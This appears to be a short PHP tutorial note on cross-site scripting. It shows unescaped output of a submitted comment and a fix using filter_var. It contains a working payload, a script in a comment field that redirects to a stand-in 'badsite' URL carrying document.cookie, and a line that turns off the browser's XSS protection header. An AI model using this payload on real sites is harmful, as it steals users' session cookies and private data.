XSS
This attack works only if the application fails to escape output.
# Browsers have some XSS protection,
# we need to disable it for this test example.
<?php header('X-XSS-Protection:0'); ?>
<script>
function setCookie(c_name,value,exdays) {
var exdate=new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value = escape(value) + ((exdays==null) ? "" :
"; expires="+exdate.toUTCString());
document.cookie = c_name + "=" + c_value;
}
setCookie('username', 'john'); // Logged user data in Cookie
setCookie('email', 'john@yahoo.com');
</script>
# User submit malicious comment
<form method="POST">
Add a comment:
<textarea name="comment">
<script>
document.location =
"badsite/test.php?cookies="+ document.cookie; // Look Here
</script>
</textarea>
<inputt type="submit" name="btn_submit"/>
</form>
# Redirects to badurl?cookies=username=john&email=john@yahoo.com
# and expose logged user private data
# Wrong!
echo $_POST['comment']; // Look Here
# Correct
filter_var($_POST['comment'], FILTER_SANITIZE_STRING);
Last update: 424 days ago
